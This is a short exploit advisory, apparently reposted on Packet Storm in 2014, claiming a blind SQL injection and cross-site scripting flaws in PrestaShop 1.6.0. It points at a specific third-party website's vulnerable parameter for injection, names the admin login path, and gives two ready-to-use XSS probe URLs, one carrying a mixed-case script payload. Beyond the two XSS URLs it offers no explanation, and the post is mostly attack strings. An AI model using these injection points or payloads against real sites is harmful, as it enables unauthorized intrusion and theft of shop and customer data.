PrestaShop 1.6.0 Blind SQL Injection

2014-05-05T00:00:00
ID PACKETSTORM:126476
Type packetstorm
Reporter indoushka
Modified 2014-05-05T00:00:00

Description

                                        
                                            `PrestaShop V1.6.0 Blind Sql Vulnerability 0-Day  
===============================================  
Author : indoushka  
vendor : http://www.prestashop.com/fr/telechargement  
Dork : No 4 noob  
  
http://swift-strike.com/ajax/getSimilarManufacturer.php?id_manufacturer=3 (inject her)  
  
Login :  
  
path/admin  
  
Cross site scripting :  
  
/index.php?controller=search&tag=bat_213771818860'():;771818860  
/index.php?controller=search&orderby=position&orderway=desc&search_query=e'%22()%26%25<ScRiPt%20>prompt(771818860)</ScRiPt>&submit_search=Search  
`